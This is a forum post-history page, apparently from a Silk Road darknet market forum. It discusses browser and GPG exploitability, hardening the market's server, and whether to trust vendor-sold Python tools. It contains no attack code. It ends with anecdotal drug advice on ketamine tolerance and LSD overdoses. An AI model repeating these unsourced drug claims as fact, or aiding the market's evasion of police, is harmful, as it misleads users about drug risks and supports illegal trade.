Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - kmfkewm

Pages: 1 ... 144 145 [146] 147 148 ... 249
2176
Quote
What are those serverside pieces of code that find their way into the clients main memory/HD? That's a bolt from the blue for pine. I thought something like that would essentially illegal across the board because it could compromise the website itself if a hacker only needed to examine his RAM to extract data about the backend. I guess I took 'serverside' and 'clientside' as statements of fact rather than more general ideas with some caveats/exceptions attached. It's difficult to question literally everything you read or you never get anywhere.

the php code stays on the server but the html files it generates do not. the stylesheets the generated may not. The images on it do not. etc. If you don't have javascript disabled javascript can run on your machine as well. A lot of remote code execution bugs with firefox are linked to font rendering actually. There have been vulnerabilities in the firefox html engine as well, I am not certain but I believe they could be carried out with html only. Actually a little research has made me certain, here is an example of a firefox vulnerability that could be exploited with a specially crafted href http://www.cvedetails.com/cve/CVE-2007-2671/ . It doesn't mention the possibility of remote code execution, only a crash and denial of service, but where there is crashing remote code execution is generally possible. So you are correct that the php code for SR does not run in your memory, but things from SR are indeed present in your computers memory and in some cases on its HD.


Quote
HTML can actually be exploited? Ok, now you're scaring me. I take it you mean that if a scripting language was allowed, then it could engineer something like a buffer overflow with the browser's HTML engine or something like that? Because if a bunch of <br> and <span> statements in any order, pattern or magnitude can be used to exploit then you can count me among the terrified. I've heard of images having exploits, but that it was rare, but not about GPG sigs or stuff like that.

Firefoxes HTML engine can be exploited with HTML.  Here is a link about gpg being remotely exploited during signature verification although it is not the example I was thinking of it is the first thing I found about GPG exploits while searching for it http://forums.gentoo.org/viewtopic-p-6848828.html and here is another example of specially crafted signed / encrypted data being used to pwn people who process it through GPG: http://lwn.net/Articles/212909/

2177
just looked it up, seems Ubuntu does have apache compiled as position independent since version 9.04 so that is a big plus. Hopefully SR server has a 64 bit processor to take advantage of that.

2178
Quote
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.

Well you actually may very well download parts of it to your hard drive depending on your exact browser configuration, but you certainly download it and have it in memory. It can still be used to exploit you, but it requires a lot more skill on the part of the attacker to pwn you through a website than it does to pwn you by getting you to run their malicious program , especially if it is not severely restricted in what it is allowed to do on your system (such as javascript is). In short, going to an pwnt website is probably a lot safer than running malicious.exe (or even .py) (even though it doesn't necessarily have to be, but I think for the sake of pragmatism we can assume that most people here are not using air gaps or properly implemented process isolation).

Quote
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage just those components cannot contain an exploit for you to worry about because it's not even programming code.

It definitely does touch your machine and can be used to exploit vulnerabilities in your system (likely but not necessarily browser) to take over your system. Well strictly speaking the php code doesn't but what it produces does. Even HTML can be used to pwn people, if there is a remote code execution vulnerability in the browsers HTML engine (as has happened before. In fact even images have had exploits embedded in them for pwning image viewing software that views them....even GPG signatures have had exploits contained in them). Unfortunately I do not know the finer details of how such advanced hacking is carried out, but it is possible. These attacks are extremely rare and  vulnerabilities like this are few and far between, although it was not that long ago I remember reading about a html based exploit against firefox.

Quote
And if SR indeed did offer up it's server side code as open source, LE would surely be delighted to examine it for weaknesses.

And they would probably find some. SR should have his code professionally audited too, he is clearly not a security expert. He does know what linux is and what Tor and GPG and bitcoins are though, so he has probably done a less than horrible job at configuring SR, although I wonder how much php experience he has and how much experience he has hardening servers. Someone with no experience hardening servers is extremely likely to make a much easier target than someone who has extensive knowledge on hardening servers, although the OS used will add some level of 'built in' security. Ubuntu is definitely not the best choice he could have gone with, for someone with his apparent level of server hardening I would certainly have suggested that he went with OpenBSD as it is hardened by default and contains preconfigured security solutions with less focus on requiring the person running the server to know how to do a lot of different specialized configurations to lock things down. I also am not sure but I wonder if Apace is default compiled as a position independent executable on Ubuntu....or if he would know how to manually specify it during compile time if it is not, or if he knows what a position independent executable is and how compiling apache as one would benefit security or the hardware requirements to take full advantage of it etc.....

2179
Quote
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programers could be caught out if they are not trained to analyze potentially malicious code. Code analyis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.

It is much harder to hide something in a python script than in say C or C++ source code.

2180
Quote
I can see your point, but your faith in the generosity of users is, I suspect, exaggerated.  Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC.  I'm basing this opinion on what my experience with PGP Club and GPG instruction in other threads and via PMs.

And simultaneously I don't expect anyone pays for your software. If they are not able to audit it they will have no idea if they can trust it and if they can audit it they would just do it themselves. So in the end you will make more with a tip jar than you would with software that people are either too afraid to run or know how to make themselves.

Quote
There's nothing in the GPL which prevents selling the code under that license.  In fact, here's the part of the FAQ which relates to it:

Which might be a valid point, if we were debating about the GPL instead of what is best practice for the people on this forum. As it stands, I couldn't give less of a fuck what license you give the code.

Quote
I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

It is completely apples and oranges to compare server and client side code (especially client side code that isn't even contained in a browser). The security implications of SR being run by the feds are far less than the implications of running a python script from the feds.

Quote
It's possible to compile Python code as a Windows executable, but that's not what this is.  I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb.  Ridiculous.  I'd rather just install Python, if it's not already installed, and run the code.

I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straight forward.  I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.

It is possible to make a windows executable out of a Ruby script as well, but it contains the actual script and a ruby interpreter inside of it ;). I have no real idea, but I wouldn't be surprised if it is the same thing with python. Yeah I also think it is pretty straight forward to reverse engineer bytecode, but I was trying to imagine what a close source python program would look like. I don't know Python but I do know Ruby and even the .exe's contain the source code in them, they are a cheap gimmick that packages an interpreter and the script into a single executable file.

2181
Off topic / Re: My rapping career.. opinions please.
« on: September 06, 2012, 02:09 am »
You must be MC crap ya bitch cuz your raps are whacker than shit, plus trashy as empty packages.

2182
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre.  :)

I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on. At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people. I think that the best approach is one of open source publicly audited only. If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it. I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pines concern, although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on (for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).

My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.

2183
Goddamn this thread got huge

Yeah but the bigger it gets the more we all laugh. :))

that's what she said to you

2184
Goddamn this thread got huge

that's what she said

2185
Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:

A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.
B. It is, of course, entirely open source
C. Preferably, the source code is posted in a thread on this very forum
D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P

failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.

2186
is it even possible to make python programs closed source? What is it, bytecode?

2187
Drug safety / Re: Ketamine Tolerance
« on: September 04, 2012, 07:58 pm »
I can guarantee you that ketamine tolerance goes down over time, if it didn't I would need to sniff a gram at a time. After going on monster binges I get to the point that I need to sniff lines as long and thick as a pencil, after not touching it for months I am back to before.

2188
Drug safety / Re: Ketamine Tolerance
« on: September 04, 2012, 04:06 pm »
k tolerance is completely reversible in my experience, just don't touch it for a month.

2189
Drug safety / Re: Taking LSD "Too Far"
« on: September 04, 2012, 03:51 pm »
Not people I know but documented cases.

2190
Drug safety / Re: Taking LSD "Too Far"
« on: September 04, 2012, 03:10 pm »
there were a couple people in I believe the 60's that did lines of it, thinking it was cocaine....so if they only did a .1g line of it that's like taking 100,000 tabs of acid with 100mcg on them each....they did end up going to the hospital, but I dont think there were any really lasting effects....I could be wrong though, it was a long time ago that I read that article

Some have died from sniffing massive overdoses of LSD crystal, others have lived but got a laundry list of nasty effects including bleeding through their skin. Of course these are doses equal to thousands of hits.

Pages: 1 ... 144 145 [146] 147 148 ... 249